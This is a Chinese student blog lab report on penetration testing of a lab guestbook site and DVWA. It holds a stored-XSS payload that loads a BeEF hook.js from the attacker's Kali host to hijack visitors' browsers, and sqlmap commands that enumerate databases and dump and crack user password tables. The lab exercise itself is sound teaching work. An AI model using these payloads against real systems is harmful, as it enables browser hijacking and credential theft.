网络渗透测试实验三

已于 2022-10-28 20:17:47 修改
阅读量684 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试
于 2021-10-11 22:38:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52497013/article/details/120713130
版权

目录

实验三 XSS和SQL注入

一、实验目的:

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

二、系统环境:

Kali Linux 2、Windows Server

三、网络环境:

交换网络结构

四、实验工具:

Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

五、实验步骤:

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。(IIS搭建网站)

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

  1. 利用AWVS扫描留言簿网站,发现其存在XSS漏洞。

首先登陆留言薄网站,要输入账号跟密码。
在这里插入图片描述
在这里插入图片描述

  1. Kali使用beef生成恶意代码:
    在这里插入图片描述

在这里插入图片描述

3.访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,<script src=“http://Kali的IP地址:3000/hook.js”></script>插入恶意代码:
在这里插入图片描述

在BeEF中捕获目标主机:
在这里插入图片描述

4.实施一个简单的反射型XSS攻击:
在这里插入图片描述
在这里插入图片描述

管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页:
在这里插入图片描述

进入登陆此网页的主机,找到Hooked Domain中的Redirect Browser并设置URL为桂电官网的网址,点击右下角的Execute在对应主机就可以看到只要打开留言簿网站就会跳转到桂电官网。
到此,以上的XSS攻击就完成了。

5、回答问题:实验中XSS攻击属于哪种类型?

存储型 XSS

SQL注入

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。

1、注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1,返回

ID: 1
在这里插入图片描述

First name: admin![在这里插入图片描述](https://img-blog.csdnimg.cn/c3bada383c3a4e19b812662dcb57711b.jpg#pic_center

Surname: admin

返回正常;

再次输入1’,报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your
MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
在这里插入图片描述

此时可以断定有SQL注入漏洞,

http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;
在这里插入图片描述

2、枚举当前使用的数据库名称和用户名。
在这里插入图片描述

你输入的命令:

sqlmap -u
“http://192.168.0.103/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=47fe35dc615fb4592d2f6b7cb1737f9d’
-b --current-db --current-user

Sqlmap输出:
在这里插入图片描述
在这里插入图片描述

在DVWA网页中按【F12】可以找到PHPSESSID(如图所示)
在这里插入图片描述

3、枚举数据库用户名和密码

你输入的命令:

sqlmap -u
“http://192.168.0.103/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#”
–cookie=‘security=low;PHPSESSID=47fe35dc615fb4592d2f6b7cb1737f9d’–string=“Surname”
–users --password

Sqlmap输出:
在这里插入图片描述

由上图可发现密码扫描出来的账号密码不可知,所以要使用kali自带的字典进行爆破密码。

4、枚举数据库
在这里插入图片描述

你输入的命令:

sqlmap -u
“http://192.168.0.103/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#”
–cookie='security=low; PHPSESSID=47fe35dc615fb4592d2f6b7cb1737f9d ’
–dbs

Sqlmap输出:
在这里插入图片描述

5、枚举数据库和指定数据库的数据表

-D 数据库名:指定数据库

–tables:枚举指定数据库的所有表

你输入的命令:

sqlmap -u
“http://192.168.0.103/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=47fe35dc615fb4592d2f6b7cb1737f9d’
-D “dvwa” --tables

Sqlmap输出:
在这里插入图片描述

6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

–columns:获取列的信息

你输入的命令:

sqlmap -u
“http://192.168.0.103/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=47fe35dc615fb4592d2f6b7cb1737f9d’
-D “dvwa” -T users --columns

Sqlmap输出:
在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列

–dump:存储数据表项

你输入的命令:

sqlmap -u
“http://192.168.0.103/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=47fe35dc615fb4592d2f6b7cb1737f9d’
-D “dvwa” -T users -C “user_id,user,password” --dump

Sqlmap输出:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

使用字典爆破本地密码,这个password用MD5解码就可以看到了。

六、心得体会:

完成这个实验,让我收获颇丰,我先是试着做了一遍感觉效果不是很理想。然后我在B站学习了SQL注入和XSS攻击的相关知识后,再重新做了一次实验感觉非常NICE。

_AaRong_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
怎么做网络测试
漫步云端的博客
07-13 4951
简单了解 安装测试 一:简单了解 在移动设备进行弱网测试一般有两种方案: 1:Android设备连接到PC上,通过Fiddler,Charles,NET-Simulator等工具实现。 2:在专有服务器上构建弱网络Wi-Fi,移动设备连接该Wi-Fi进行弱网络测试,如Facebook的ATC和腾讯的Wetest-WiFi。 缺点:开销大、依赖PC端,功能不完善(如丢包,抖动)。 对于游测来说,以上不是很好的选择。可以使用腾讯WeTest开发平台推出的弱网测试工具QNET QN...
网络测试
paidaxing_dashu的博客
03-08 2488
一,网路测试相关名词概念: 1)弱网: 低于2g速率的时候都属于弱网也可以将3g划分为弱网 一般wifi不纳入弱网测试范围。 2)带宽: 例如所谓 10M 带宽,其实是指 10Mbps (兆比特) 计算带宽理论最快下载速度:10÷8=1.25MB/s 那么100M的带宽最快下载速度是12.5MB/s。 但这只是理论上的速度,在这个数值附近浮动都算是较理想的,实际上因为各种因素,还要再减去一些损耗...
2024年最新浅谈专项测试之弱网络测试_弱网测试用例,2024年最新十年开发经验软件测试架构师
最新发布
2401_84141304的博客
05-06 638
(5)打开Android设备的设置-WALN,找到和电脑连的一样的网络,长按-修改网络,弹出网络设置对话框,找到代理选择手动,主机名(电脑ip地址),端口8888(跟fiddler设置一致),然后点击确定按钮。4.弱网络环境下,请求的数据返回时间较长,等待的过程,如果页面上的相关控件仍然可以操作,则有可能出现闪退现象;原因:采用分段上传方式,在请求超时时间到时,分段传输没有结束,代码逻辑不对,导致每次重试都重头上传,一直循环。数据下载过程、下载失败后,未进行数据回滚,止后重新下载,出现数据重复。
基础网络测试(TCP/UDP)
weixin_49566876的博客
02-07 9018
常用参数-t:不停的ping指定的主机,直到停止。ctrl+c停止-a:解析计算机NetBios名。-n x:发送指定的数据包数。默认情况下,只发送四个数据包。-l size:指定发送的数据包的大小。默认的情况下发送的数据包大小为32byte,也可以自己定义它的大小,但是最大也只能发送 65500byte。-i:指定TTL值在对方的系统里停留的时间(生存时间)。-S: srcaddr 要使用的源地址。-s: count 计数跃点的时间戳(仅适用于 IPv4)。
网络速度测试
嵌入式
12-02 4294
          Netperf是一种网络性能的测量工具,主要针对基于TCP或UDP的传输。Netperf根据应用的不同,可以进行不同模式的网络性能测试,即批量数据传输(bulk data transfer)模式和请求/应答(request/reponse)模式。Netperf测试结果所反映的是一个系统能够以多快的速度向另外一个系统发送数据,以及另外一个系统能够以多快的速度接收数据。     ...
什么是网络测试
qqqqqkmbnjjhb的专栏
09-30 1万+
什么是网络测试?Web测试是用于验证网站应用程序是否可以满足特定功能,安全性,可用性,可访问性,视觉和性能标准的过程。在将代码移交给生产之前,Web测试对于捕获关键错误的应用程序的成功至...
网络渗透测试实验报告三
12-27
网络渗透测试实验报告三
信安网络渗透测试实验三.docx
12-15
"信安网络渗透测试实验三" 本实验报告涵盖了 XSS 和 SQL 注入两方面的知识点,从实验目的、实验内容、实验过程等方面进行了详细的介绍。 一、实验目的: 了解什么是 XSS;了解 XSS 攻击实施,理解防御 XSS 攻击的...
网络渗透测试实验报告二
12-27
网络渗透测试实验报告二
网络渗透测试实验一.docx
12-03
"网络渗透测试实验一" 本实验旨在让学生理解网络扫描和网络侦察的作用,并通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用。实验使用了Kali Linux 2和Windows网络环境,Metasploitable2虚拟机...
信安网络渗透测试实验一.docx
12-15
网络渗透测试实验报告 本实验报告的目的是理解网络扫描和网络侦察的作用,通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,并通过信息收集为下一步渗透工作打下基础。本实验使用 Kali Linux 和...
基本网络测试
火雨(Nick)
12-26 3255
基本网络测试 一.目的:   主要目的是熟练掌握操作系统自带的基本网络测试工具,包括状态监视、流量监视和路由监视。熟练掌握Windows操作系统自带的基本网络测试工具,包括IP 地址查询、MAC地址解析、网络状态测试、网络安全测试等工具。 二.内容:     (1) Windows NT 环境下网络状态监视工具的使用包括ipconfig、ping;     (2) Windows N
网络测试一般使用这四个命令就可以了
weixin_44215445的博客
01-31 9205
网络测试一般使用这四个命令就可以了 一、ping命令 ping (Packet Internet Groper), ping命令通常用来作为网络可用性的检查。ping命令可以对一个网络地址发送测试数据包,看该网络地址是否有响应并统计响应时间,以此测试网络。 1、按Win+R输入cmd,回车,然后打开DOS命令界面 2、输入ping /? ,出ping的相关参数命令使用 用法: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
网络性能指标及测试方法
sinat_15677011的博客
05-25 6515
1、网络可用性。 网络可用性是指网络是否能正常通信,路径是否可达,可以在终端电脑上用“ping”命令来测试网络的连通性。 例如:ping 10.48.128.1,这条命令测试的是从该终端电脑向目的10.48.128.1发送icmp echorequest,并等待接收icmp echo reply来判断目的是否可达。ping命令的目的可以是IP地址,也可以是域名,例如ping oa.shtl.com.cn,需要注意的是如果目的是域名,则需要一个可用的DNS去解析该域名。 Ping 命令有非常丰富的命令选项,
网络测试-2G、3G、4G网速参考
jiangjingwei1992911的博客
11-28 1万+
2G:150Kbps,折合下载速度15-20K/s; 3G:1-6Mbps,折合下载速度120K/s-600K/s 4G:10-100Mbps,折合下载速度1.5M/s-10M/s 如何模拟2G/3G网? 方法1:「推荐」 使用360WIFI限速,根据以上的参考值进行限速测试。 方法2: 与其他TEAM借4G流量卡进行测试,然后使用
简单的网络测试命令
姚明明的博客
06-05 7443
1. ipconfig命令 1)ipconfig——当使用IPConfig时不带任何参数选项,那么它为每个已经配置了的接口显示IP地址、子网掩码和默认网关地址。 2)ipconfig/all—相比于不带选项的ipconfig命令,加了all选项之后显示的信息将更加完善,会显示所有网络适配器的完整的TCP/IP配置。例如IP的主机信息,DNS信息,物理地址信息,DHCP服务器信息等等。适配...
SQL 手动注入学习实战 —— dvwa 从low到impossible《low篇》
qq_40476955的博客
01-10 4895
在PHP动态构造SQL语句的语言是query="SELECT∗FROMusersWHEREusername=".query=" SELECT * FROM users WHERE username = "._GET[“name”]; 通过控制name参数,修改执行的SQL语句,可以达到攻击的目的。
渗透测试——网络服务渗透攻击
热门推荐
YT的博客
02-14 1万+
网络服务渗透攻击指的是:在之前的博客描述的内存攻击,以远程主机运行的某个网络服务程序为目标,向该目标服务开放端口发送内嵌恶意内容并符合该网络服务协议的数据包,利用网络服务程序内部的安全漏洞,劫持目标程序控制流,实施远程执行代码等行为,最终达到控制目标系统的目的。 以 Windows 系统平台为例,根据网络服务攻击面的类别来区分,可将网络服务渗透攻击分为以下三类: 针对 Windows 系统自...
kali渗透测试实验
09-19
搭建Kali Linux作为渗透测试实验平台是学习渗透测试的一种最佳方式之一。你可以使用虚拟化技术,如VMware Workstation,在电脑模拟一个计算机环境,然后在这个环境进行渗透测试。这样的好处是你可以放心地进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_AaRong_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值